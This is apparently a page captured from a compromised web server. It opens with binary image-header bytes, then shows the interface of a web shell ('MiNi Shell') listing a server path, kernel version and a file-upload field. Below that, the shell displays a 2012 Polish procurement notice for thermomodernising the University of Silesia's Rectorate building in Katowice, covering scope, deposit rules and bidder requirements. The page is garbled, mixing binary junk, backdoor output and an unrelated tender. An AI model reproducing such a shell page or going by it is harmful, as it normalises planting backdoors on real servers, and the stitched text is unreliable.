JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/124173-N-2012.html

<p class="kh_header"><b>Katowice: (Kompleksowa termomodernizacja budynku Rektoratu Uniwersytetu Śląskiego 
w Katowicach) <BR>

 Numer sprawy:  DZP.381.06.2012.RB</b><br>
<b>Numer ogłoszenia: 124173 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 32 3592048, faks 32 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> (Kompleksowa termomodernizacja budynku Rektoratu Uniwersytetu Śląskiego 
w Katowicach) <BR>

 Numer sprawy:  DZP.381.06.2012.RB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <BR> 1.	Przedmiotem zamówienia jest kompleksowa termomodernizacja budynku Rektoratu Uniwersytetu Śląskiego w Katowicach (Ul. Bankowa 12, 40-007 Katowice), obejmująca zakresem następujące roboty:<BR>
1) 	termorenowacja budynku polegająca na wykonaniu nowej elewacji wentylowanej (składającej się z ocieplenia osłoniętego panelami włókno-cementowymi),<BR>
2)	wykonanie wentylacji grzania/chłodzenia z AKPIA,<BR>
3) 	wykonanie instalacji wentylacji mechanicznej wraz z odzyskiem ciepła oraz AKPIA, <BR>
4)	inne roboty budowlane.<BR>
2.	Zamawiający dopuszcza składanie ofert równoważnych. Jeżeli w dokumentacji projektowej, przedmiarach lub innych elementach SIWZ zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub norm, 
o których mowa w art. 30 ust. 1-3 uPzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań /równoważnych/ pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych pod warunkiem, że zagwarantują one realizację robót zgodnie z dokumentacją projektową oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w ww. dokumentach 
i niniejszej SIWZ. <BR>
3.	Zamawiający nie dopuszcza składania ofert częściowych. <BR>
4.	Zamawiający nie dopuszcza składania ofert wariantowych. <BR>
5.	Termin realizacji - roboty objęte zamówieniem należy zrealizować w terminie do 
10  miesięcy od daty zawarcia umowy. <BR>
6.	Okres gwarancji: <BR>
1) Wymagany okres gwarancji na wykonane roboty minimalnie 36 miesięcy.<BR>
2) Wymagany okres gwarancji na zamontowane materiały, armaturę nie mniejszy niż 36 miesięcy, a jeżeli gwarancja producenta jest dłuższa, zgodnie z gwarancja producenta. <BR>
3) Z uwagi na fakt, iż w budynku istnieją i działają fragmenty instalacji objęte niniejszym zamówieniem oraz, że przy realizacji nowego zadania będzie dochodziło do ingerencji w już wykonaną instalację, Wykonawca będzie zobowiązany do przejęcia gwarancji na poniższe elementy, w które będzie ingerował do dnia 06.08.2013, 
a w szczególności:<BR>
a)	2 szt. agregatów chłodniczych Carier  o mocy chłodzącej 2x250kW chłodu <BR>
b)	2 szt. drycoolerów chłodniczych <BR>
c)	Komplet węzła ciepła/chłodu <BR>
d)	Główne zasilanie instalacji chłodzenia <BR>
e)	Podstację energetyczną- 2 pola zasilające instalację grzanie/chłodzenie <BR>
f)	Instalacje AKPiA oraz BMS w części dotyczącej węzła i instalacji chłodu.<BR>
7.	Zamawiający nie przewiduje możliwości udzielenia zamówienia uzupełniającego. <BR>
8.	Zamawiający dopuszcza możliwość realizacji zamówienia z udziałem podwykonawców. Jeśli wykonawca będzie realizował zamówienie z udziałem podwykonawców, Zamawiający żąda wskazania części zamówienia, której wykonanie powierzy podwykonawcom. <BR>
	9.	Rozliczenia finansowe między Zamawiającym a Wykonawcą  dokonywane będą  
w polskich złotych (PLN). <BR>
10.	Zamawiający nie przewiduje zawarcia umowy ramowej.<BR>
11.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia. <BR>
12.	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. <BR>
13.	Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców,  u których ponad 50% stanowią osoby niepełnosprawne w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób
niepełnosprawnych lub właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.12.00-8, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:         
149.000,00 PLN   (słownie: sto czterdzieści dziewięć tysięcy 00/100 zł ) <BR>
-przelewem na rachunek Zamawiającego lub <BR>
-w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,   z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym lub <BR>
- w gwarancjach bankowych lub <BR>
- w gwarancjach ubezpieczeniowych lub <BR>
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). <BR>
2.  Wadium wnoszone w pieniądzu należy zgodnie z art. 45 ust 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r., Nr 113 poz. 759 z późn. zm.), wpłacić na rachunek bankowy Zamawiającego: <BR>

    Bank Śląski Spółka Akcyjna o/Katowice, Nr rachunku 29 1050 1214 1000 0022 0331 4816, w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w rozdziale VI ust. 1 SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego ww. rachunek. <BR> 

3. Wymagania dotyczące wadium wnoszonego w formie gwarancji i poręczeń:<BR>
3.1.	 nie budzące wątpliwości, zobowiązanie gwaranta lub poręczyciela do zapłaty beneficjentowi   /wierzycielowi (Zamawiającemu t.j.) należności, w przypadku gdy:<BR>
a)	 zleceniodawca / dłużnik (Wykonawca) w odpowiedzi na wezwanie, o którym mowa  
w art. 26 ust. 3   ustawy Pzp, nie złożył dokumentów o których mowa w art. 25 ust. 1 lub  pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie, <BR>
b)	oferta zleceniodawcy / dłużnika (Wykonawcy) została wybrana, a:<BR>
  1) zleceniodawca / dłużnik (Wykonawca) odmówił podpisania umowy w sprawie zamówienia  publicznego na warunkach określonych w ofercie;<BR>
                 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy. <BR>
   3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn  leżących  po stronie zleceniodawcy / dłużnika (Wykonawcy), <BR>
3.2. zobowiązanie gwaranta / poręczyciela winno być nieodwołalne, bezwarunkowe i płatne na pierwsze żądanie beneficjenta / wierzyciela (Zamawiającego). <BR>
     3.3. gwarancja / poręczenie winny spełniać wymogi określone we właściwych przepisach. <BR>
            Powyższe warunki muszą wynikać z gwarancji lub poręczenia. 
4. Wadium, bez względu na sposób jego wniesienia, musi obejmować co najmniej cały okres  związania ofertą, o którym mowa w rozdziale VI ust. 2 niniejszej Specyfikacji Istotnych Warunków Zamówienia.
5. W przypadkach, o których mowa w rozdziale VI ust. 3 niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz w przypadku wniesienia odwołania po upływie terminu składania ofert, Zamawiający zwróci się do Wykonawców o przedłużenie ważności wadium lub wniesienie nowego wadium z tym, że jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.
6. W przypadku wniesienia wadium przelewem zaleca się, aby Wykonawca dołączył do oferty kserokopię  dokonania przelewu.
7. W przypadku wniesienia wadium w pozostałych formach (gwarancje, poręczenia) oryginał dokumentu potwierdzającego wniesienie wadium Wykonawca winien dołączyć do oferty.
8. Zamawiający dokona zwrotu wadium Wykonawcom zgodnie z postanowieniami art. 46 ust. 1 i  ust. 2 ustawy Prawo zamówień publicznych z zastrzeżeniem ust. 4a i ust. 5.
9.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:
   9.1.   w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów  o  których   mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
     9.2.   którego oferta została wybrana: 
             a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach        określonych     w ofercie,
               b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
               c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
 z  przyczyn leżących  po  stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie  
o spełnieniu warunków udziału w postępowaniu,  o którym mowa   
w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie w wykonaniu robót budowlanych  w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie polegających na :<BR>
1)	wykonaniu co najmniej jednej roboty budowlanej polegającej na wykonaniu elewacji o powierzchni nie mniejszej niż 2500m2 
w dowolnym systemie z elementami szklano-aluminiowymi, 
z wyłączeniem technologii lekko-mokrej,<BR>
2)	wykonaniu co najmniej dwóch robót budowlanych polegających na wykonaniu instalacji wentylacji mechanicznej wraz z odzyskiem ciepła i AKPIA w budynku o kubaturze nie mniejszej niż 25.000m3 każda, <BR>
3)	wykonaniu co najmniej dwóch instalacji niskoprądowych w systemie otwartym, sterującymi i nadzorującymi instalacje niskoprądowe zawierające minimum 2.500 zmiennych każda, opartą na technologii LON WORKS,<BR>
4)	wykonaniu dwururowej instalacji grzania/chłodzenia (ten sam zład służy w sezonie grzewczym do grzania, a po sezonie grzewczym do chłodzenia) w budynku o kubaturze co najmniej 25.000m3, w którym źródłem ciepła/chłodu w pomieszczeniach są klimakonwektory zasilane ze wspólnego węzła grzania/chłodzenia, <BR>

 Ocena spełnienia warunków udziału w postępowaniu. <BR>
Zamawiający uzna powyższe warunki za spełnione, jeżeli Wykonawca  złoży do oferty oświadczenia i dokumenty potwierdzające ich spełnienie, tzn.: <BR>
1. oświadczenie o spełnieniu warunków udziału w postępowaniu, <BR>         
2.  wykaz robót budowlanych z podaniem ich rodzaju i wartości, daty  miejsca wykonania wraz  z dokumentami   potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone <BR>
- o których mowa  w rozdziale IV ust.1 pkt 1,2,3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu,  o którym mowa  
w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania  zamówienia, posiadającymi prawo wykonywania zawodu, które będą uczestniczyć w wykonywaniu zamówienia: <BR>
1) jako  kierownik budowy w specjalności  konstrukcyjno-budowlanej  posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, <BR>
2)	jako kierownik robót instalacyjnych, posiadający uprawnienia budowlane w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych i wodociągowych bez ograniczeń,<BR>
3)	jako kierownik robót elektrycznych, posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji  
i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. <BR>

Ocena spełnienia warunków udziału w postępowaniu. <BR>
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży do oferty oświadczenia potwierdzające  spełnienie ww. warunków, tj.: <BR>
1)	 oświadczenie o spełnieniu warunków udziału w postępowaniu, <BR>
2)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia   odpowiedzialnych za kierowanie robotami budowlanymi wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie  do dysponowania tymi osobami, <BR>
3)	 oświadczenie,  że osoby które będą uczestniczyć 
    w wykonaniu zamówienia, posiadają wymagane uprawnienia
-  o których mowa  w rozdziale IV ust.1 pkt 1,4, 5  SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu,  
o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis oferowanego przedmiotu , zawierający co najmniej: nazwę oferowanego systemu elewacyjnego, typy i nazwy oferowanych central wentylacyjnych i sterowników, oraz nazwę oprogramowania BMS - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w celu wykazania spełnienia warunków określonych 
w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, Wykonawca polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust.2b ustawy - Prawo zamówień publicznych, zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (stosowny dokument zależy załączyć do oferty)- Oryginał, <BR>
2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Ww. dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - Oryginał lub kopia poświadczona za zgodność 
z oryginałem przez Wykonawcę, <BR>
3. Informacja o działalności gospodarczej wygenerowana 
z Centralnej Ewidencji Działalności Gospodarczej (CEIDG)
- składa Wykonawca będący osobą fizyczną prowadzącą działalność     gospodarczą(Dołączenie wydruku ze strony internetowejzalecane przez Zamawiającego), <BR>
4. Pełnomocnictwo - wymagane jest jeżeli oferta jest 
podpisana przez pełnomocnika (Oryginał lub kopia poświadczona za zgodność 
z oryginałem przez mocodawcę lub notariusza), <BR>
5. Dokument potwierdzający wniesienie wadium - Oryginał.
W przypadku wniesienia wadium przelewem zaleca się, dołączenie do oferty kserokopii  dokonania przelewu,<BR>
6. Dokument potwierdzający posiadanie autoryzacji producenta elementów sterowania instalacją grzania/chłodzenia oferowanego systemu - oryginał lub kopia poświadczona za zgodność 
z oryginałem przez Wykonawcę, <BR>
7. W przypadku, gdy Wykonawca zamierza integrować oferowany system grzania/chłodzenia z systemem działającym u Zamawiającego, Wykonawca załącza do oferty dokument potwierdzający dysponowanie narzędziami oraz posiadanie wiedzy,  pozwalającej na uzupełnienie programu sterującego  
o nowe części oraz  autoryzacje firmy TAC - Oryginał lub kopia poświadczona za zgodność 
z oryginałem przez Wykonawcę, <BR>
8. Jeśli Wykonawca będzie realizował zamówienie z udziałem podwykonawców Zamawiający żąda wskazania części zamówienia, której wykonanie powierzy podwykonawcom - 
Oryginał.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art.144 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony. <BR>
